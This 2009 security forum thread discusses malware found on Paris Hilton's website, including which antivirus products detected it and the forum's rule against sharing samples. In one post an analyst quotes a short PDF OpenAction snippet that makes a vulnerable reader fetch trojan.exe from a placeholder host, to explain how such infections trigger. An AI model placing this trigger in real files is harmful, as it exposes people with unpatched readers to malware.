Paris Hilton's Web Site Infected With Malware

Discussion in 'malware problems & news' started by HURST, Jan 13, 2009.

Thread Status:
Not open for further replies.
  1. HURST

    HURST Registered Member

    Joined:
    Jul 20, 2007
    Posts:
    1,419
    By now more AV's should detect it...
    Anyways, here is the whole article:
    http://www.informationweek.com/news...jhtml?articleID=212800229&cid=RSSfeed_IWK_All
     
  2. emperordarius

    emperordarius Registered Member

    Joined:
    Apr 27, 2008
    Posts:
    1,218
    Location:
    Who cares
    That's what happens to who likes Paris Hilton.:D
     
  3. dw426

    dw426 Registered Member

    Joined:
    Jan 3, 2007
    Posts:
    5,543
    That's not hot.
     
  4. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,047
    Location:
    Saudi Arabia/ Pakistan
    Tried Dr.Web Link scanner.
     

    Attached Files:

  5. The Hammer

    The Hammer Registered Member

    Joined:
    May 12, 2005
    Posts:
    5,619
    Location:
    Toronto Canada
    It would have been interesting to know which seven detected the malware.
     
  6. HURST

    HURST Registered Member

    Joined:
    Jul 20, 2007
    Posts:
    1,419
    I have a link to a VirusTotal scan.
    Since we are not allowed to post VT screenshots, are we allowed to list those who passed or post the link?

    BTW, aigle, Dr.Web didn't detect it.
     
    Last edited: Jan 13, 2009
  7. Pedro

    Pedro Registered Member

    Joined:
    Nov 2, 2006
    Posts:
    3,502
    I think that's the reason it's not allowed. It invites A vs. B and so on.
     
  8. emperordarius

    emperordarius Registered Member

    Joined:
    Apr 27, 2008
    Posts:
    1,218
    Location:
    Who cares
  9. Dark Shadow

    Dark Shadow Registered Member

    Joined:
    Oct 11, 2007
    Posts:
    4,553
    Location:
    USA
    Now if it was Eva Longoria,In a Two piece swim,It may have been worth the malware.
     
  10. funkydude

    funkydude Registered Member

    Joined:
    Apr 5, 2004
    Posts:
    6,854
    Hello, could you PM me a copy of the malware please (the sample not the results). Thanks.
     
  11. GES/POR

    GES/POR Registered Member

    Joined:
    Nov 26, 2006
    Posts:
    1,490
    Location:
    Armacham
    Well done to F-Prot's Eldorado's heuristic(edit. heur or gen?) engine for picking up the rootkit, also Prevx(signature?),Avast(gen. sig.),"McArtemis" (in the cloud tech), Avira(packer detection?), Microsoft(sig.), NOD32(gen), Panda(gen), VIPRE(HIPS?), VBA32(default heuristics) :thumb:
     
    Last edited: Jan 13, 2009
  12. HURST

    HURST Registered Member

    Joined:
    Jul 20, 2007
    Posts:
    1,419
    I don't have a sample. I just found the link to the results. Also, it's against the forum rules to trade malware.
     
  13. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    From the article:

    This becomes confusing in light of another statement further on:

    A glimpse into the payload:
    Unfortunately, the site has already been cleaned up so we can't test. But the techniques are similar to others that have been analyzed.

    Here is a typical triggering code inside a PDF file, using the URI vulnerability:

    Code:
    ....<< /Type /OpenAction
    /S /URI
    /URI (http://www.some_site.com/trojan.exe)
    
    If the user's PDF reader were vulnerable (not patched) many other solutions would prevent this exploit from executing.

    ----
    rich
     
  14. Jin K

    Jin K Registered Member

    Joined:
    Apr 9, 2008
    Posts:
    105
    virustotal owner should change from kaspersky 7.0 (shitty heuristic) :thumbd: to kaspersky 8.0!! most of my samples are not detected with kav7
     
Loading...
Thread Status:
Not open for further replies.